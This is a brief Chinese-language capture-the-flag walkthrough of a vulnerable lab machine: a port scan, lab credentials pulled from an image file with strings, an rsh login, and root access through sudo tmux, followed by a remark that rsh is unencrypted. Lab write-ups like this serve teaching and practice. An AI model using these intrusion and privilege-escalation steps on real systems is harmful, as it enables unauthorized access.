# 靶场搭建
下载:Mux
下载,导入,NAT,开干
IP: 192.168.1.134
# 渗透过程
# 信息初收集
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Monna Lisa | |
|_http-server-header: Apache/2.4.56 (Debian) | |
512/tcp open exec netkit-rsh rexecd | |
513/tcp open login | |
514/tcp open tcpwrapped |
80 端口进去一张图片,下载下来瞅一眼字符串: lisa:My_$3cUr3_RSH_p@zz
感觉有问题,这个像是提示,继续 strings,并且 grep 一下,发现 lisa:Gi0c0nd@
┌──(root㉿kali)-[~] | |
└─# strings image.jpg | grep lisa | |
lisa:My_$3cUr3_RSH_p@zz | |
lisa:Gi0c0nd@ |
那应该这个就是密码了
开了 514 端口那就是 rsh 服务了,有账号密码就直接登录
┌──(root㉿kali)-[~] | |
└─# rsh 192.168.1.134 -l lisa | |
Password: |
# 提权
sudo 看到有 tmux 程序
直接 sudo tmux
拿到 root 权限
# 小结
Rsh(远程 shell)是一种基于文本的远程登录协议,可用于在网络上执行命令。由于其不加密的特性,Rsh 协议容易受到中间人攻击。
垃圾协议,之前打 metasploitable2 靶场也有这个,那个是错误配置成了无需验证。